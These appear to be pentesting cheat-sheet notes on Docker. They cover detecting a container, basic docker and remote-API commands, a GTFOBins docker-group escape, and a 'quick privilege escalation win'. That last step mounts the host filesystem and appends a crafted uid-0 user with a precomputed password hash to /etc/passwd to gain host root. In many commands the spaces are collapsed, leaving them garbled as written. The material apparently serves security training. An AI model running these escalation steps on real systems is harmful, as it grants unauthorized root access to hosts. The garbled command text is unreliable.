Target> if [ -f "/.dockerenv" ] || grep -qE "^/docker/|/docker-ce/|/containerd/|/lxc/|/docker-[[:alnum:]]+/" /proc/1/cgroup ; then echo "Running inside a Docker container"; else echo "Not running inside a Docker container"; fi
Basic commands
# Check if docker service is runningsudosystemctlstatusdocker# If not running , start itsudosystemctlstopdockersudosystemctlstartdocker# List of imagesdockerimages# List of remote host images docker-H<target-ip>:2375images# List of running containersdockerps-a# Run the docker to an interactive container with a shelldockerexec-tiflast101sh-t:terminal-i:interactive# Connect to an running docker with an interactive shell dockerexec-tiflast101sh-t:terminal-i:interactive# Run a docker dockerrun-di--nameflast101alpine:latest-d:detach-i:interactive
# Do you understand this command and potential vulnerability?dockerrun-tid-v/etc/:/mnt/--nameflast101ubuntu:latestbash# GTFOBins. If you are a member of the “docker” group, replace alpine to a target docker name and run it. dockerrun-v/:/mnt--rm-italpinechroot/mntsh
PE Local Enumeration
Linpeas.sh may catch the docker group account. In this case, you may be able to run the quick PE win below.
Quick Privilege Escalation win
# Validate if you can run. If not, you will see permission denied.dockerps-a# Prepare a new root user.passwd-1-saltevilnewrootpass# Prepare a file new_accountcd/tmpecho'newroot:$1$evil$eu2ySQGNgNghQm4ASTnKa.:0:0:root:/root:/bin/bash'>new.txt# Run dockerdockerrun-tid-v/:/mnt/--nameflast101alpine#Execute a bash command in the container that will add the new root user to the /etc/passwd filedockerexec-tiflast101sh-c"cat /mnt/tmp/new.txt >> /mnt/etc/passwd"# Login as rootsuroot